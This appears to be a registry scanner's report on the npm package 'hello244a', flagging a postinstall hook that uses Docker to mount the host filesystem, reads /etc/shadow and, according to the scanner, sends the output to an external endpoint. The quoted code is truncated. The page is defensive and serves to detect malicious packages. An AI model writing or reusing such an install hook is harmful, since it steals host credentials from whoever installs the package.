hello244a@1.0.26

⚠ Under review

Static Scan Results

scanned 4h ago · by rust-scanner

Static analysis flagged 5 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.

Decision evidence

public snapshot
Behavioral surface
Source: No risky source behavior triggered.
Supply chain: No supply-chain packaging signals triggered.
Manifest: NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

3 flagged
package.json
scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.json
scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.json
package.json#scripts.postinstall
"const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').toString(...
Critical
Command Output Exfiltration

Source executes local commands and sends command output to an external endpoint.

package.json#scripts.postinstall · L1

Findings

2 Critical · 1 High · 2 Low
Critical · Red Install Lifecycle Script · package.json
Critical · Command Output Exfiltration · package.json#scripts.postinstall
High · Install Time Lifecycle Scripts · package.json
Low · Scripts Present
Low · No License